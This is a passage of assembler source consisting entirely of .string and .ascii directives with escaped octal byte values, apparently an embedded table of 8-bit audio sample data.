&18B'&00&)\"\025\016\r\034\026\n\004\003\002\t\004\006\f\006\002\002\006\032\001\356\372\356\374" .string "\b\363\366\364\344\346\366\001\374\377\377\035$)8<089987'\020\035)\037\020\r\377\350\354\f\352\330\332\303\307\346\n" .string "\001\016\t\023\022 (\033\024\n\013\023\032\005\370\003\001\365\371\373\355\334\322\332\343\343\354\353\343\372\360\361\373\t\001\361\001" .string "\001\377\365\345\341\346\357\346\341\337\342\333\352\375\367\365\377\373\375\035\023\033\024\"$\r\r\034\t\362\366\362\366\363\353\337\337\324\326\314\322\327\317\300\303\324\342\336\345\361\361\374\363\375\363\362\327\325\337\321\325\305\324\315\310\332\343\357\365\001\362\365\020\030\033\020\024\031\033#,!\035\034\034\036&2\037\037-1155+4>,3B?0$)&\037\026\023\r\004\372" .string "\374\003\375\371\367\006\021\016\030 %\027\037#+\031\017\003\374\366\371\355\337\345\335\330\325\341\324\315\300\277\277\313\330\322\333\357\001\003\020 #\034\"+%-.-\031'.!.'%$$\037\037\037\036\020\035\026 \035\r&\021\004\n\023\005\366\356\352\347\342\337\320\313\320\310\277\310\323\304\277\313\334\332\333\354\331\325\333\343\344\340\344\325\334\326\331\340\342\337\337\346\341\355\343\345\352\342\336\352\364\356\354\370\372\374" .string "\017\r\n\030\005" .string "\377\016\004\377\001\375\007\001\b\013\020\030\017\017#'\035\025\024\025\026\021\r\006\004" .string "\377" .string "\007\006" .string "\377\t\021\016\017\026\031\f\t\022\034\020\017\t\t\020\t\356\362\372\375\354\356\372\360\375\354\376" .string "\016\016\n\030(2,9CA6800*$\022\016\024\f\376\375\b\373\355\360\355\353\357\334\344\342\361\377\367\b\032\n\t\027\032\037\022\027\016\023\022\016\r\020\030\013\n\016\021\b" .string "\001\002\375\375\377\371\367\373\347\356\363\366\346\334\345\333\333\337\344\326\340\327\326\311\325\332\315\326\323\347\344\337\335\346\343\356\356\346\365\362\354\351\370\373\361\360\370\371\371\375\377\376\005\005\376\375\376\373\362\356\364\377\355\377\372\371\002\374\372\371\003\370\373\361\004\371\364\376\376\003" .string "\f\006\f\016\022\004\t\016\007\377\377\002\374\366\366\375\370\374\376\375\377\013\n\t\r\020\f\f\027\035\031\026\032\024\026\027\005\004\004\006\004\364\003" .string "\367\370\367\374\002\n\017\022\032((,6?:6;<4.( \032\031\016\006\013\013\376\370\375\372\360\346\362\353\351\346\352\350\360\372\364" .string "\376\017\020\t\021\r\022\024\021\025\022\031\025\023\034\033\021\r\022\022\007\004\003\376\374\373\365\362\367\362\346\342\361\353\344\340\345\347\337\342\327\333\350\331\325\323\333\344\333\331\331\341\333\337\344\335\340\346\340\343\351\350\350\352\370\363\357\366\376\377\377\377\375" .string "\001\374\361\362\365\360\350\353\360\352\351\357\363\362\370\364\370\366\003\002\364\003\006\005\t\r\017\026\021\024\016\030\026\027\021\013\027\006\001\t\013\005\t\007\n\r\027\024\022\033 \033\027!$\033\030\033\032\025\021\r\005\013\b\373\372\373\370\361\366\370\363\363\366\377\003\b\f\004\007\027 \032\030&\037\030\033\032\032\022\020\003\377\377\002\370\357\371\367\354\347\355\343\340\337\333\334\340\344\344\353\370\375\371\003\f\016\f\021\030\032!$$%1-#+2/\036% \027\027\022\024\020\007\b\b\006\022\003\376\001\t" .string "\370" .ascii "\372\375\364\367\360\360\367\354\342\345\351\342\332\335\337" .ascii "\331\330\330\330\332\336\333\331\337\346\337\336\343\354\353" .ascii "\347\355\354\354\353\343\342\341\341\334\322\327\315\307\312" .ascii "\317\317\316\320\331\323\327\341\337\344\347\360\353\363\367" .ascii "\375\370\004\t\004\t\f\013\n\024\017\013\b\022\017\r\r\027\024" .ascii "\031\025\"\f\026\030\t?EO\036<?9>\032=>\036\031#\032\034\001" .ascii "\365\366\026\r\n\032\033)\034\0213932\3705(\033!\366\t\007\016" .ascii "\031\025\026$$\b\007\024\001\364\331\345\320\304\300\272" .string "\273\260\311\322\320\334\373\373\362\352\365\372\t\004\373\352\372\371\360\377\344\t\013\374\016\023\036=\r" .string "\035\n\036\373\351\341\337\360\337\324\341\007\005\001\006\013\005\020\006\370\377\t\033\367\367\363\355\341\324\345\321\342\357\325\361\361\356\016\005\003\t\030\027\b\363\373\b\374\367\364\002\006\027" .string "\352\363\f\021\356\367\372" .string "\376\353\337\337\336\334\322\313\342\356\362\350\366\373\004#\021\024\036\034#\r\373\020\377\365\373\345\363\005\016" .string "\370\022\036&$ )72\025\b\022\027\001\362\372\007\022\r\002\b\022 \031\021\023\033\024\006\374\345\363\361\355\354\337\362\016\004\n\021\017(++\036*4\027\013\001\001\006" .string "\355\342\351\365\370\333\344\366\361\355\336\343\347\347\341\316\307\342\340\326\325\335\364" .string "\375\005\031!82)7=8, \030\024\036\016\377\377\006\f" .string "\004\013\024\"&\034\036/.\016\003\001\b\005\364\354\353\366\377\361\352\373\b\016\364\360\001\377\373\360\344\347\352\352\331\324\342\344\347\354\367\376\023\032\016\006\n\024\004\357\344\325\323\323\310\276\300\320\323\312\315\340\353\360\346\342\357\365\372\343\323\347\353\337\326\331\341\356\362\352\363\n\032\024\013\013\030\026\013" .string "\365\374\004\376\360\365\003\f\f\022\026\037+-%\036,-$\024\006\017\r\005\365\353\370\b\376\364" .string "\020#\033\027\026!'\031\013\t\031\030\n\004\n\024\032\025\020\031+1&\033\036!\027\007\372\356\352\343\325\307\300\317\325\320\322\340\356" .string "\006\002\005\030\037\021\b\006\023\024\f\001\t\033#\034\022!01'\036!(\"\022\006\003\n\004\362\353\365" .string "\374\374\001\b\025\036\023\t\017\016\t\367\350\343\336\336\317\305\311\331\342\331\334\350\370\377\371\365\374\b\b\365\351\361\371\357\334\330\340\351\353\337\335\354\371\363\343\344\356\351\337\322\307\312\316\307\273\272\313\323\326\332\337\356\373\004\004\377\f\025\r\005\373" .string "" .string "\372\357\346\360\004\003\370\003\024& \030\036%,%\020\b\026\031\n\375\002\021\027\020\023\027%1&\035 ,#\027\f\003\003\004\373\357\357\374\b\006\t\023#02.*5<,\026\021\026\021\003\367\361\374\003\367\353\361\001\003\364\352\356\365\361\343\326\326\342\342\326\325\343\362\371\372\005\021!/-).93%\034\023\021\016\005\370\370\007\n\001\002\013\031\"\034\026\030 \017" .string "\377\006\373\351\345\347\360\364\352\341\361\002\001\363\361\375\377\365\347\335\337\343\336\321\316\335\350\351\350\362\375\b\r\b\003\t\r\004\363\347\346\340\330\313\300\302\317\322\306\307\331\350\347\342\340\351\361\356\334\324\335\347\335\321\332\353\367\366\366\375\020\037\032\021\027#!\025\t\005\007\006\375\364\362\376\007\004\004\021\037(+('.2&\026\017\022\020\004\372\364\373\007\006\371\375\023\036\027\r\025 !\027\n\007\021\022\004\372" .string "\022\024\r\017\031%,$\030\033!\026\001\363\355\347\336\322\306\303\314\323\317\317\335\356\367\372\374\002\016\026\017\004\007\023\023\b\003\n\025\033\027\025\035.4#!',\"\021\t\b\n\003\367\361\374\004\004\376\006\021\026\032\025\021\025\030\016" .string "\366\365\360\350\342\332\333\340\347\342\343\361\374\377\374\377\002\b\t\374\362\367\374\366\351\345\356\363\362\356\355\371" .string "\376\362\356\366\364\345\332\327\322\321\311\302\300\310\321\321\322\336\354\364\373" .string "\003\007\016\r\004\001\004\004\376\372\370\373\003\007\003\003\020\033\030\022\025\033\034\027\016\t\f\021\007\374\001\f\r\t\013\021\032\036\033\026\027\033\024\b\377\377\374\365\360\356\355\362\372\371\376\005\021\024\027\034\034\036\036\035\022\013\r\b\377\367\364\364\363\362\352\350\357\360\347\337\340\343\335\327\323\321\326\325\323\322\335\354\360\362\376\t\024\032\036#&+)!\034\035\030\020\f\b\005\006\013\t\b\r\024\027\026\025\026\027\030\023\b\005\b\005\373\367\373\376\375\373\373\377\006\006\377\375\003\003\372\363\363\361\357\353\351\347\356\364\363\365\377\007\t\f\021\020\017\020\f\004\376\372\364\355\347\343\336\340\342\337\335\341\347\346\342\346\351\353\354\350\345\351\360\356\353\357\373" .string "" .string "\007\r\024\032\034\033\033\"\"\026\024\025\020\n\n\007\006\t\f\017\016\026\034\033\036$#!\"\"\033\025\025\020\t\005\002\002\004\005" .string "\377\006\f\t\004\b\f\n\006\004\003\004\006\002\376\004\t\t\007\f\020\021\017\017\r\n\b" .string "\366\360\353\341\330\324\317\310\307\312\313\313\320\327\334\341\347\352\357\367\372\367\371\001\004\001\003\t\r\017\022\022\024\033\034\026\024\030\027\016\t\b\004\001\377\371\370\374\375\374\374\003\005\005\007\n\t\006\005\001\375\370\365\357\352\352\347\344\345\351\350\346\353\361\364\365\365\371\373\375\373\367\370\376\371\364\366\372\373\367\370\371\372\373\371\362\361\362\354\343\341\336\331\323\322\322\320\324\326\331\336\346\354\357\370" .string "\001\004\013\016\016\r\020\020\016\016\r\013\021\023\022\021\027\035\030\030\034\035\033\032\030\026\030\031\023\021\025\031\026\026\032\034\034\035\034\032\032\031\024\017\016\013\005\001\002\001\376\377\003\005\007\f\017\023\030\032\030\031\035\033\024\022\023\017\b\005\003" .string "\376\372\364\362\364\360\350\345\346\342\335\332\332\331\332\332\332\336\346\352\356\365" .string "\006\t\022\031\033\035! \036\037\034\027\026\026\022\f\017\017\f\013\r\020\017\017\020\016\017\022\f\t\b\n\004\377\377" .string "" .string "\375\375\374\375\376\375\367\371\373\365\361\361\360\355\354\354\354\354\357\361\362\370\374\374\377\006\007\004\003\006\002\376\371\366\361\356\353\343\337\340\337\327\330\334\334\330\330\333\334\336\336\336\337\345\350\346\353\363\367\370\375\004\007\013\017\021\023\026\026\022\022\024\020\013\013\f\n\007\n\013\f\017\020\021\025\031\030\025\030\033\026\021\022\021\r\t\007\004\004\004\001\376\001\004\001\377\002\004\002\001\003\002\003\004\003\002\005\b\006\006\013\016\013\n\f\f\007\005\002\374\371\363\352\344\343\335\325\322\323\322\316\321\323\327\333\337\342\346\356\362\363\370\377\002\003\006\f\016\020\023\024\026\032\033\027\026\033\030\022\021\021\016\t\t\007\007\004" .string "\376" .string "\003\004\002\007\n\013\007\013\n\t\006\004\377" .string "\376\371\365\366\366\360\361\360\002\354\357\364\023\b\032.\032\017\364\002\370 \352\317\r\016\340\343\002\332\301\313\324\341\001\332\340\026\372\345\365\030\037\350\f%\371)\016\0310\355\345\362\001\337\307\331\337\316\275\275\315\340\337\323\325\361\353\333\f\021\350\336" .string "\026)@\025\033\025\365\355\332\373" .string "\315\366\t\366\376\003&11(\03683\366\373\022\356\313\316\352\330\330\361\373\005\001\366\364\006\001\006\036\033\021\377\007\r\022\036\030\025-!\357\031)\023\007\020-\023\017\021\b\031\367\321\363\023\373\345\f\033\002\t\027\020$%\013\03785\034!?(\026IdWP<\"2\034\356\006\007\363\331\345\351\312\332\330\323\367" .string "\341\344\351\307\303\347\003\366\373\016\017\016\t\374\365\017\003\341\376!\n\365!1'3-&.\034\007\024\033\016\355\362\b\354\344\367\370\377\357\334\341\346\343\307\321\361\356\335\354\375\357\342\347\362\375\373\354\001\021\376\361\373\006\363\356\367\364\364\354\350\331\327\313\255\305\341\323\323\344\344\317\303\307\307\334\354\342\371\030\n\002\"@36B<5'\016\376\371\335\301\302\332\315\302\333\351\333\325\333\333\370" .ascii "\371\0330\031\006\035(\033\032&&$!\003\007\035\b\364\017 \r\t" .ascii "\023\024\t\001\377\007\034 \020\0341\034\004\027\"\017\017\034" .ascii "\024\026\022\371\375\005\372\372\0317,#*\036\021\016\t\021\034" .ascii "\024\t\021 \n\376\022\033\017\006\001\350\326\305\262\271\317" .ascii "\304\270\327\347\326\315\336\340\336\345\350\371\024 \0355UO" .ascii "?MPA::2&\031\001\365\376\355\327\344\354\327\310\320\310\277" .ascii "\301\301\312\341\345\336\356\371\353\347\371" .string "\003\375\376\007\003\002\375\350\351\365\343\325\355\370\347\343\353\342\325\330\325\336\367\366\347\365\377\341\317\333\341\327\335\346\352\363\361\351\366\022\f" .string "\021\031\006\367\367\357\345\343\331\345\376\376\375\022\037\023\f\033\037\032%$\037\"\021\372\373\003\364\347\371\377\355\353\363\362\363\376\002\016&&\0360<*$8@:??;9)\030\030\037\017" .string "\016\022\375\363\364\362\363\366" .string "\02610#/5!\025 #\035\035\031\024\031\016\374\003\020" .string "\357\362\345\313\303\307\310\320\334\340\352\377\375\357\374\005\366\364\005\r\r\027!%1.!#(\027\f\030\027\004\375\376\371\372\371\366\002\017\004\371\005\t\366\357\374\375\371\371\362\353\355\335\311\323\336\316\310\330\334\317\315\320\316\326\334\334\352\001\376\364" .string "\007\371\365\004\013\f\020\r\005\002\362\333\332\336\321\313\327\333\322\325\334\340\353\361\361\375\007\373\361\370\366\345\344\357\362\370\001\003\t\021\n\376\f\031\016\016\"#\025\021\020\r\020\021\f\025!\027\t\023\030\t\006\022\027\026\026\023\021\024\f" .string "\t\027\021\017\033\036\027\025\025\026\035\"!-9/'/.#*69;;-\"\033\007\361\364\366\346\342\355\353\337\341\345\345\354\360\351\354\356\336\326\344\357\353\363\006\016\021\022\r\f\r" .string "\365\376\007" .string "" .string "\r\023\021\017\f\013\017\f\005\016\026\t\377\005\005\373\376\004\003\006\004\371\365\370\354\340\351\360\346\345\357\352\340\340\336\335\344\351\350\357\367\354\342\351\351\335\336\350\351\347\344\336\333\331\315\307\324\335\331\333\347\347\340\334\332\336\347\350\350\371\007\377\376\016\022\r\020\022\016\t\377\353\341\336\313\273\303\313\304\310\327\334\334\345\352\361\003\016\022 /*'14/2874/% \036\017\005\013\n\376\373" .string "\374\366\366\366\374\007\b\t\030!\026\025#%\037%,,-)\036\037$\031\022\"+!\035#\034\021\f\006\004\n\007\377\007\r\003\373\002\002\371\364\357\344\332\317\303\304\312\306\306\325\336\335\343\356\360\363\371\375\007\027\034!5A:<GB641&\036\021" .string "\372\366\343\326\335\335\316\313\323\322\317\321\324\333\350\351\351\366\001\372\370\004\t\006\b\t\t\b\377\363\361\360\342\330\335\333\321\316\316\311\310\311\307\316\334\336\336\355\364\352\352\365\362\356\365\370\367\372\372\365\371" .string "\366\360\372\371\352\346\352\343\334\332\331\337\350\350\353\373\005" .string "\002\016\024\023\026\031\033\035\026\016\024\027\013\007\020\022\013\f\021\020\023\024\021\031$!\036*0''0.*.+%$\035\021\017\021\005\376\006\006\375\376\005\006\007\r\023\036))*57,)/+%#\037\034\032\016\002\004\001\354\340\340\325\304\277\277\275\302\306\310\326\347\351\352\375\b\004\b\026\033\036%*-43+./\"\031\034\027\f\007\006\001\375\372\365\371\375\366\363\374\373\362\363\370\365\362\362\357\356\356\346\337\346\350\334\334\347\346\337\343\350\347\352\354\352\362\374\365\361\375" .string "\365\364\374\374\370\370\364\362\361\347\333\334\334\320\313\322\324\321\325\333\340\350\353\353\365\375\370\367" .string "\377\367\372\376\374\376\002" .string "\002\b\003\375\005\b\376\376\b\006" .ascii "\005\n\t\f\017\017\030!\034\033(+\"\"*)$\" \037 \030\020\027" .ascii "\031\016\013\023\023\016\016\020\023\027\025\023\035$\035\034" .ascii "&(\"%*()( \034\034\020\004\007" .string "\005\370\365\374\370\362\366\370\365\367\365\357\360\362\347\342\352\353\344\350\361\363\363\364\364\367\370\362\357\370\372\364\370\004\b\t\017\024\032\037\035\032$(\036\033#!\026\025\025\017\f\006\374\372\372\355\342\347\346\330\325\332\327\323\327\331\332\341\344\343\355\365\361\362\374\375\367\371\374\371\366\363\356\354\353\341\334\342\341\330\332\341\336\333\336\337\341\345\341\341\355\362\353\355\373\373\364\367\372\366\363\356\346\345\345\331\320\331\334\323\326\342\346\350\360\367\376\t\r\016\033$!\"-.*+,)'\"\033\032\030\f\005\b\004\373\373\377\375\375\002\004\b\020\021\022\037$\036\"-+$(+'%!\032\034\035\021\013\023\023\007\005\013\007\002\001\001\002\005\001\377\b\r\005\004\013\t\001\375\371\362\354\341\327\330\331\317\314\326\330\324\332\342\344\352\361\364\374\b\n\016\035&#(30*,*\"\037\030\016\013\t\373\362\366\362\346\346\354\350\345\350\351\355\361\356\357\370\374\365\367" .string "\377\373\373\373\373\371\361\353\356\354\340\333\341\336\325\326\330\327\331\333\333\343\354\352\352\367\374\365\370\377\374\367\371\367\363\364\361\351\353\354\343\335\342\340\326\327\331\327\324\331\331\337\345\350\353\371" .string "" .string "\006\023\024\024\030\033\035\034\032\024\036\030\026\005\b\027B\025\371\t#\025(N5<\365\0062<\030\035\003$\013\017-\023" .string "\006M\341\357\367\255\321\277\317\026\310\266\272\311\346A[;[ #\006\353\357\343\336\356\345\317\333\330\300\313\327\334\377\375\367\350\276\332\333\321\322\312\260\237\267\247\255\274\322\321\356\332\375/11\b\007\372\003\353\306\301\323\265\275\327\333\004\r\005\005!&5;2$-83/*=) \037\037+46\0368UJH-+C1,)!5\037#\"\n5\"\030\"\025#!\017\005!0\036" .string "\361\356\356\331\301\267\254\301\315\276\311\355\375\370\373\340\305\323\312\314\331\324\344\326\311\303\273\324\340\336\344\370\022\027\021.BB<&\033)'\022\007\026!*90<BBC.# '\023\006\006\376\007\364\344\361\374\b\013\001\006\025'\031\b\021\017\r\n\377\350\350\337\316\314\322\334\343\343\312\272\300\306\302\262\303\325\330\333\340\352\374\006\354\335\346\353\346\337\315\322\333\326\333\331\347\360\337\336\312\307\343\353\350\337\355\005\n\016\016\034/83/@QK:/,:1\035\026%./3)9DD?4:F>2#$30.<R`VGF?C9!\022\020\013\366\352\340\325\327\324\265\235\240\265\305\314\324\345\371\372\354\345\361\372\347\333\335\333\347\354\347\366\005\006\366\354\357\360\365\367\352\345\355\357\347\334\324\326\343\341\326\333\351\375\374\370" .string "\013\027\023\003" .string "\n\b\361\350\351\343\353\347\335\344\370\006\016\f\021\034,4(.98\037\006\375\376\370\353\344\354\001\f\r\025(/,(\030\f\b\374\347\325\320\324\337\345\336\350\375\004" .string "\372\013\035 \026\006\006\f" .string "\351\333\333\334\323\315\310\315\336\347\345\353\374\005\r\r\006\b\022\020\375\361\367" .string "\374\362\354\362\002\006\372\374\016\032!-17@8!\023\023\022\r\005\374\001\030!\033 ,4&\007\363\365\004\376\360\362\376\004\377\371\373\005\025\033\030&:JW`\\Y^N4% \036\021" .string "\366\370\004\376\356\361\377\002\370\354\350\353\355\342\321\313\322\324\314\310\310\315\333\335\324\327\350\360\351\336\331\341\344\323\272\265\271\272\257\254\263\274\302\275\270\300\316\324\326\327\333\352\371\373\360\357\370\365\350\333\324\333\342\332\316\335\367\001\376\376\b\021\026\013\005\r\030\027\017\021\031\".2-7HLE=;>=0\035\036(\"\026\023\035*2--<JKGDDGD7''22,)*02$\024\034&\032\013\003\005\b\001\360\343\342\334\304\261\260\270\305\322\330\333\351\372\374\364\360\362\367\365\347\333\346\367\365\353\353\364\375\374\362\360\377\t" .string "\365\363\366\364\352\332\321\323\325\314\302\300\307\322\327\320\317\340\361\355\344\351\361\365\357\340\333\346\353\340\333\345\361\370\374\372\375\013\027\023\013\b\b\004\367\343\326\335\347\336\327\346\376\021\030\030\"4;/$%%\034\017\002\377\006\007" .ascii "\374\001\t\024\031\026\032+4*!%-,!\022\021\035\037\017\t\024" .ascii "\034\036\036\032" .string "\036,/$\033\033\031\022\005\362\352\362\362\343\334\346\367\376\375\377\021)2*(-*\034\t\370\360\356\343\325\317\322\326\330\326\313\311\315\310\272\266\301\316\323\317\313\324\345\345\334\342\365\002\006\r\026&790++\"\026\007\371\362\365\361\343\340\353\365\371\371\375\013\032\032\022\024\034\032\020\005\377\375\376\366\355\356\362\365\370\371\367\376\013\f\002\002\b\t\004\372\364\374\006" .string "\366\373\006\005\377\376" .string "\006\f\t\005\n\017\013\004\374\363\353\353\342\326\326\334\343\347\353\363\005\023\024\021\027\037\034\024\r\t\n\b\376\370\373\375\375\377\377" .string "\006\017\013\004\006\n\b\002\373\367\375\002\371\363\375\006\005\004\007\f\021\023\f\007\n\007\377\374\372\367\372\377\375\366\370\376\377\376\374\377\b\016\007\002\b\b\377\361\343\327\317\304\271\271\304\313\320\332\342\352\366" .string "\001\003\013\022\024\030\033\037*.'#+.(&''(%\035\030\030\021\b\003\375\365\364\364\357\353\360\367\373\375" .string "\007\022\026\020\020\026\026\016\007\003\002" .string "\371\361\363\366\363\361\367\371\372\001\003\376\374\375\370\362\356\347\345\354\355\351\355\372\376\374\376" .string "" .string "" .string "\373\362\357\357\351\345\345\344\343\350\352\351\354\364\373\001\005\007\017\031\031\023\026\034\030\021\r\t\007\005\374\366\372\374\367\371\377" .string "" .string "\006\007\004\004\005\002\001\376\371\372\377\375\367\374\005\b\n\017\026\034\037\033\026\024\017\005\375\370\360\353\352\346\342\343\344\342\340\332\325\326\332\326\325\337\346\347\347\353\355\361\364\362\366\001\006\t\023\036\"'..+)(\"\036\030\020\020\020\t\003\007\013\b\007\b\n\f\n\004\002\003\377\370\367\366\362\362\363\362\364\370\373\377\004\006\007\017\022\r\n\016\f\006\003" .string "\375\374\370\360\357\360\354\350\355\360\357\363\372\374\375" .string "\001" .string "\377\371\364\366\365\355\355\363\367\370\373\001\006\f\f\n\016\021\013\b\n\b\005\006\b\007\013\017\021\026\033\033\034##\034\033\035\031\022\017\013\006\005\377\371\372\374\370\367\375\376\376\003\007\007\t\f\016\021\023\021\022\025\021\n\b\t\005" .string "\375\373\372\370\357\350\347\340\322\310\303\272\264\264\265\271\301\311\320\334\347\354\364\001\005\007\r\024\024\025\027\025\023\022\013\005\005\003\375\373\375\373\372\373\374\372\373\372\372\373\371\365\366\370\364\361\364\367\365\365\366\366\371\371\363\363\366\363\354\354\356\352\347\351\352\353\357\362\366\376\003\003\b\016\013\007\007\006" .string "\373\370\365\365\363\357\357\362\362\356\360\362\362\363\365\367\372\377\002\006\r\020\021\030\035\035\036$'')+,/-()+&\037 \032\030\031\030\031\034\034 &'&+/+(*($\037\033\031\031\025\017\021\025\024\023\027\032\032\031\031\026\025\024\r\013\013\006" .string "\377\375\365\360\355\345\335\331\323\320\321\320\316\322\330\326\326\335\341\341\345\354\361\367\376\004\013\023\025\025\032\033\025\021\017\013\004\376\367\363\361\352\343\343\345\337\334\337\337\336\336\335\335\337\337\334\335\341\336\334\337\341\336\337\342\342\341\343\342\341\344\341\336\340\342\335\333\336\335\332\332\332\331\332\332\332\336\341\342\344\351\353\351\351\352\350\345\342\337\337\340\335\335\345\353\354\360\371\377\003\b\f\017\026\027\026\032 \034\035!$ #$%$&$$&#!!$\0341\027,\036\031/\002\016\031(4(30\022\033\034$" .string "-7+\"\0251\020\036,'#'\0316\026\034/\022\017\004\366\376\374\337\321\337\375\341\354\372\370\374\377\366\353\371\f\005\017& \034-6!\036$'797$\024)\026\017)\025!$" .string "\004\006\355\366\354\337\350\352\360\342\350\324\304\323\343\332\354\374\362\357\361\346\326\354\366\363\353\003\n\006\f\375\365\365" .string "\b\361\366\003\327\335\330\302\334\306\313\336\317\332\323\304\316\304\313\320\331\347\340\360\360\345\347\350\364\373\373\017\t\035\026\027\034\n\022\016\036$)\037\025\023\013\375\017\001\t\022\370\r\371\355\360\355\352\360\363\374\001\367\365\350\357\365\377\020\031\035$& \032\037!\032\032\037&\037\033\013\374\357\337\335\344\324\320\311\276\275\253\266\264\265\312\317\336\353\351\353\366\367\003\020 '(1,,%+$#-\"%$\031\b\377\373\360\364\372\371\002\377\360\355\352\355\355\352\370\361\364\372\362\365\360\351\352\357\372\001\001\001\375\376\370\374\007\b\017\022\022\023\t\003\376\371\367\365\371\371\377\364\352\342\340\334\327\336\341\341\344\346\335\341\337\343\360\365" .string "\r\025\037 \035$'.1=?671)!\" \036!\"\035\024\022\006\002\006\013\017\025\027\027\033\032\026\026\035 \"+5,22'-*(031-)\"\030\024\016\f\016\r\006\003\004\371\360\360\357\354\355\356\352\345\336\330\325\326\327\330\342\357\364\366\377\377\376\006\013\022\037%)+'$\033\030\030\024\022\020\022\n\001\374\365\361\355\351\355\362\356\351\350\341\335\337\342\346\356\363\367\370\374\373\364\367\373\375" .string "\003\005" .string "\366\362\346\341\343\335\336\344\341\331\327\325\315\311\312\314\320\326\327\326\325\323\320\321\330\335\337\346\352\347\345\345\343\345\350\354\363\372\375\373\370\367\363\356\365\371\373\002" .string "\001\001\373\367\370\375\001\004\n\013\013\b\002\377\001\005\006\013\025\027\021\021\022\r\016\021\024\030\034\032\026\024\017\006\001\t\t\b\f\t\007" .string "\370\365\363\364\367\367\373\373\365\357\354\350\345\345\350\353\355\354\350\347\344\342\346\354\362\367\376" .string "" .string "\377\374\373\375\003\006\n\022\021\013\007\005\003" .string "\004\t\013\017\016\t\007\006\001\001\t\017\021\024\026\022\r\b\005\004\b\n\t\013\013\002\372\367\363\357\360\363\365\367\365\357\354\352\347\347\356\366\367\373\374\370\367\363\360\363\367\372\375" .string "\001\374\367\365\363\364\370\373\376\001\376\367\364\363\357\360\370\375\377\002\005\002\377\375\375\001\b\016\021\026\032\025\024\026\031\034\"*155201/.39840( \030\022\020\022\022\017\017\r\007\001\377\001\004\n\020\026\031\032\025\024\026\025\027\035\"#!\036\027\017\t\002\376\377\375\366\362\355\343\332\331\331\333\341\350\355\360\363\362\362\370\374\002\013\026\032\032\034\031\025\024\023\026\034\037\036\036\035\027\020\020\020\021\024\025\025\023\016\004\376\373\367\364\367\371\366\362\354\346\340\335\333\335\343\347\346\347\350\344\341\344\351\356\367\376\001\004\004" .string "\374\376\377\375" .string "\002\377\370\361\351\337\331\324\322\323\323\317\314\312\305\302\305\313\323\334\345\354\362\365\366\372\001\b\016\030 $$#!\036\036\034\035!!\033\027\023\013\002" .string "" .string "\377" .string "\001\377\376\374\366\363\366\370\370\376\003\004\003\002\001" .string "\002\004\006\r\021\017\016\016\013\006\006\007\b\n\t\005\001\373\362\352\346\342\334\332\330\323\315\311\304\302\304\305\312\322\330\332\337\345\350\353\364\375\005\016\025\031\035\037\034\034 \" !\"\035\026\020\t\003\377\372\366\365\363\353\346\344\337\332\332\335\340\342\345\346\350\352\351\352\357\364\367\373" .string "\001\001" .string "\376\376\377\377\376" .string "" .string "\372\366\362\354\347\345\343\341\341\337\332\330\327\321\317\322\324\324\327\334\334\335\337\341\344\353\360\366\376\004\006\t\016\020\021\025\032\036!\"!! \034\032\034\034\031\031\031\026\021\016\013\n\n\b\b\013\013\007\006\b\007\007\t\r\021\025\027\027\032\034\033\033 #\"#$ \035\031\024\020\017\n\006\004" .string "\370\361\356\347\341\336\335\333\333\332\331\332\335\335\341\351\360\366\375\005\n\016\023\027\034!#&**'$$ \034\033\031\030\026\023\017\016\f\006\005\007\007\004\005\005\003\002" .string "\377\377\002\001\001\005\006\003\002\004\004\003\005\007\b\t\b\006\006\006\003\001\003\003\001" .ascii "\377\373\370\365\362\360\356\354\351\352\350\344\343\343\341" .ascii "\341\344\346\351\354\357\360\366\372\373\001\b\f\016\023\026" .ascii "\027\027\030" .string "\030\032\033\031\031\034\033\027\026\027\026\024\025\026\027\030\027\026\030\031\027\027\033\034\032\033\034\033\032\031\027\030\031\027\026\030\027\023\022\022\021\020\021\020\020\020\016\f\f\n\006\006\007\004\001\377\373\366\363\356\351\347\345\341\340\342\340\336\341\344\346\351\357\364\372\377\002\006\f\020\020\024\031\032\031\032\032\031\026\023\021\021\017\013\n\013\b\005\004\004\003\002\003\003\005\005\003\003\005\004\001\002\004\002\001" .string "\376\373\372\367\364\364\363\360\357\361\357\354\355\356\355\356\360\360\361\363\361\361\362\361\356\357\360\355\353\352\350\345\343\340\336\337\336\334\335\340\337\340\343\347\351\355\361\366\373\377" .string "\004\t\013\013\017\023\023\023\025\024\023\023\021\020\022\020\r\r\017\f\n\013\f\n\013\f\013\f\f\n\n\013\n\b\t\t\007\006\006\004\003\001" .string "\377" .string "\376\374\375\375\373\372\372\372\371\371\370\367\367\365\360\357\356\351\345\344\343\337\334\334\332\332\332\331\333\340\341\342\350\355\357\362\370\374" .string "\005\b\013\017\021\021\023\025\024\023\025\024\022\021\017\f\n\007\004\002\001\375\371\371\367\362\361\360\357\356\356\355\356\357\356\356\360\361\360\360\364\364\363\364\364\364\365\364\362\363\364\362\360\361\360\355\353\353\351\347\346\344\343\343\340\335\335\335\332\332\334\334\334\336\337\341\344\346\351\355\361\363\367\374\376" .string "\004\b\n\016\021\022\025\027\027\030\033\033\031\031\033\031\027\026\024\021\020\f\n\t\007\003\002\002" .string "\376\376\376\377\377" .string "" .string "\003\005\004\006\t\n\t\f\016\r\r\r\f\013\n\006\004\003\377\372\366\364\356\350\345\341\335\333\330\326\326\327\326\330\335\340\342\350\355\362\367\374\001\006\n\r\020\025\026\026\030\032\032\031\031\031\030\026\026\024\024\021\016\r\r\t\007\006\005\002" .string "\376\374\374\372\367\366\370\366\365\365\367\364\366\365\371\367\373\370\373\372\374\366\371\367\371\366\355\343\357\034\367\337\311\347\363%\033 \022\bR!91" .string "\022\002\356\005\003\007\320+\022\301\377\324\320\365\355\006C\356\322\317\332\023D9$!\340\353\265\317\340\337\022\030\002\360\003\344\337\320\350\347\374\353\324\262\265\336\274\314\315\320\266\314\304\266\327\336\303\325\332\315\034\t\375\006\353\362\334\345\365\334\334\335\335\005\026\034*\374\b\f\013\034\t\002\370\017\022\031%0NW;IbGH=)/E?08\031&!\027.4@/\"7=29\004\013\023\001\003\362\345\371&\025\003\016 \007\377\361\342\347\336\343\327\310\325\334\315\312\316\241\244\255\236\325\345\353\370\337\354\372\356\354\337" .string "" .string 